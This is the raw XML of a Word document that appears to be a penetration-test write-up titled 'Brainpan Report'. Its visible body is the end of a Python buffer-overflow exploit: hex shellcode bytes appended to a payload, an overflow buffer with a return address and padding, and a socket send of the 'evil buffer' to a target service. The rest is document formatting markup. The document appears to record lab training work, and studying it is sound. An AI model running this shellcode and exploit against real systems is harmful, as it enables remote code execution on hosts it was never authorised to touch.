      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xfc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>\x31\x42\x0e\x03\x4a"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0547602D"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"\x48\xd3\xa2\x7b\x8f\xe4\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>\x28\x6c\x58\x5b\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4145C3"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xfb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xbf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>\x2b\xb6\x36\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xbf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xdf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>\x6f\x79\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>\x12\x0f"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491E1225"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"\x30\x79\x54\x67\xc9\x7f\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xbb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xfe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>\xa5\x7d\xc3\x01"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AAFA26"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"\x8d\x0b\x22\xb1\x97\x5b\xf4\xe2\xe4\x5f\x7f\xe5"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374B3C14"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"\xc6\xe0\x2d\x8d\xb6\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xcf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>\xa2\x25\x2f\x3f\x6a\xd7"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4C8E8D"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payload += "\xc6\xb6\x97\x45\x4a\x40\xb6\xd9\x67\x9f\xb9"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00059569"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postfix = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71419CFB" w14:textId="77777777" w:rsidR="008B1CFC" w:rsidRPr="008B1CFC" w:rsidRDefault="008B1CFC" w:rsidP="008B1CFC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D304018"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buffer = prefix + overflow + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>retn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> + padding + payload + postfix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F17CA89" w14:textId="77777777" w:rsidR="008B1CFC" w:rsidRPr="008B1CFC" w:rsidRDefault="008B1CFC" w:rsidP="008B1CFC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EC1C051"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s = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>socket.socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>socket.AF_INET</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>socket.SOCK_STREAM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FB8F09" w14:textId="77777777" w:rsidR="008B1CFC" w:rsidRPr="008B1CFC" w:rsidRDefault="008B1CFC" w:rsidP="008B1CFC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02AB1B2C"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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793E24B9"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  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s.connect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>((</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6013C0D2"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  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D9338B"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  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"Sending evil buffer...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579B53FB"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  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(bytes(buffer + "\r\n", "latin-1"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF1A104"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 xml:space="preserve">  print("Done!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBB18AD" w14:textId="77777777" w:rsidR="008B1CFC" w:rsidRPr="008B1CFC" w:rsidRDefault="008B1CFC" w:rsidP="008B1CFC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>except:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAAD1C9" w14:textId="61B74356" w:rsidR="3EFF00EC" w:rsidRPr="000231B3" w:rsidRDefault="008B1CFC" w:rsidP="000231B3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008B1CFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"Could not connect.")</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="3EFF00EC" w:rsidRPr="000231B3" w:rsidSect="005762C5">
      <w:headerReference w:type="default" r:id="rId39"/>
      <w:footerReference w:type="default" r:id="rId40"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="720" w:header="432"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FFAC5" w14:textId="77777777" w:rsidR="00E52596" w:rsidRDefault="00E52596">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="415C78E8" w14:textId="77777777" w:rsidR="00E52596" w:rsidRDefault="00E52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Walbaum Display">
    <w:altName w:val="Cambria"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="8000002F" w:usb1="0000000A" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Walbaum Heading">
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="8000002F" w:usb1="0000000A" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Walbaum Display Light">
    <w:altName w:val="Cambria"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="8000002F" w:usb1="0000000A"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6A32F" w14:textId="46B9AC43" w:rsidR="21624631" w:rsidRDefault="21624631"/>
  <w:tbl>
    <w:tblPr>
      <w:tblW w:w="0" w:type="auto"/>
      <w:tblLayout w:type="fixed"/>
      <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="3120"/>
      <w:gridCol w:w="3120"/>
      <w:gridCol w:w="3120"/>
    </w:tblGrid>
    <w:tr w:rsidR="3EFF00EC" w14:paraId="73AFF6F2" w14:textId="77777777" w:rsidTr="3EFF00EC">
      <w:trPr>
        <w:trHeight w:val="300"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="6862EC7E" w14:textId="14657B1C" w:rsidR="3EFF00EC" w:rsidRDefault="3EFF00EC" w:rsidP="00B41D67">
          <w:pPr>
            <w:pStyle w:val="Header"/>
          </w:pPr>
          <w:r>
            <w:t>sh3llsh0ck</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="413F3F23" w14:textId="2B8DBDF2" w:rsidR="3EFF00EC" w:rsidRDefault="3EFF00EC" w:rsidP="3EFF00EC">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="1B8DBF6B" w14:textId="613112FF" w:rsidR="3EFF00EC" w:rsidRDefault="3EFF00EC" w:rsidP="3EFF00EC">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="558FFFC7" w14:textId="7499BEED" w:rsidR="3EFF00EC" w:rsidRDefault="3EFF00EC" w:rsidP="3EFF0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D358F" w14:textId="77777777" w:rsidR="00E52596" w:rsidRDefault="00E52596">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="54036734" w14:textId="77777777" w:rsidR="00E52596" w:rsidRDefault="00E52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EFF00EC" w14:paraId="00B94EB8" w14:textId="77777777" w:rsidTr="3EFF00EC">
      <w:trPr>
        <w:trHeight w:val="300"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="44DBD5A4" w14:textId="3D0C5BF2" w:rsidR="3EFF00EC" w:rsidRDefault="00E51589" w:rsidP="3EFF00EC">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:left="-115"/>
            <w:rPr>
              <w:color w:val="000000" w:themeColor="text1"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:color w:val="000000" w:themeColor="text1"/>
            </w:rPr>
            <w:t>Brainpan</w:t>
          </w:r>
          <w:r w:rsidR="3EFF00EC" w:rsidRPr="3EFF00EC">
            <w:rPr>
              <w:color w:val="000000" w:themeColor="text1"/>
            </w:rPr>
            <w:t xml:space="preserve"> Report</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="7F857F2B" w14:textId="00EA7E49" w:rsidR="3EFF00EC" w:rsidRDefault="3EFF00EC" w:rsidP="3EFF00EC">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="657C2963" w14:textId="741F9F7E" w:rsidR="3EFF00EC" w:rsidRDefault="002B797B" w:rsidP="3EFF00EC">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Page </w:t>
          </w:r>
          <w:r w:rsidR="3EFF00EC">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="3EFF00EC">
            <w:instrText>PAGE</w:instrText>
          </w:r>
          <w:r w:rsidR="3EFF00EC">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B41D67">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>1</w:t>
          </w:r>
          <w:r w:rsidR="3EFF00EC">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="63649771" w14:textId="2E74C7E5" w:rsidR="3EFF00EC" w:rsidRDefault="3EFF00EC" w:rsidP="3EFF00EC">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45077"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="72C67532"/>
    <w:lvl w:ilvl="0" w:tplc="5A920302">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C4AA4010">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1920" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04AED3DA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="DD9E7EBC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3840" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="88E65810">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4800" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B0AA09CC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="125A4670">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B4FA5C8A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7680" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="8716E11C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8640" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1361932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33D143"/>
    <w:rsid w:val="000010ED"/>
    <w:rsid w:val="000012D9"/>
    <w:rsid w:val="0001289A"/>
    <w:rsid w:val="00015591"/>
    <w:rsid w:val="000231B3"/>
    <w:rsid w:val="000270B9"/>
    <w:rsid w:val="000271AE"/>
    <w:rsid w:val="00033555"/>
    <w:rsid w:val="00035DA1"/>
    <w:rsid w:val="00044CFD"/>
    <w:rsid w:val="0004600C"/>
    <w:rsid w:val="00052733"/>
    <w:rsid w:val="000678F9"/>
    <w:rsid w:val="00071781"/>
    <w:rsid w:val="0008325F"/>
    <w:rsid w:val="0008570F"/>
    <w:rsid w:val="000A1033"/>
    <w:rsid w:val="000A2BD6"/>
    <w:rsid w:val="000A6A7D"/>
    <w:rsid w:val="000B6B62"/>
    <w:rsid w:val="000C2146"/>
    <w:rsid w:val="000C7A0B"/>
    <w:rsid w:val="000D2397"/>
    <w:rsid w:val="000E3037"/>
    <w:rsid w:val="000E6037"/>
    <w:rsid w:val="000E7246"/>
    <w:rsid w:val="00101F14"/>
    <w:rsid w:val="00110678"/>
    <w:rsid w:val="00114AD4"/>
    <w:rsid w:val="001158AB"/>
    <w:rsid w:val="0011620F"/>
    <w:rsid w:val="001209DC"/>
    <w:rsid w:val="00125663"/>
    <w:rsid w:val="001272DB"/>
    <w:rsid w:val="00131CB3"/>
    <w:rsid w:val="00133711"/>
    <w:rsid w:val="001418EB"/>
    <w:rsid w:val="00142A90"/>
    <w:rsid w:val="00175C47"/>
    <w:rsid w:val="00180DFA"/>
    <w:rsid w:val="00186312"/>
    <w:rsid w:val="001A1269"/>
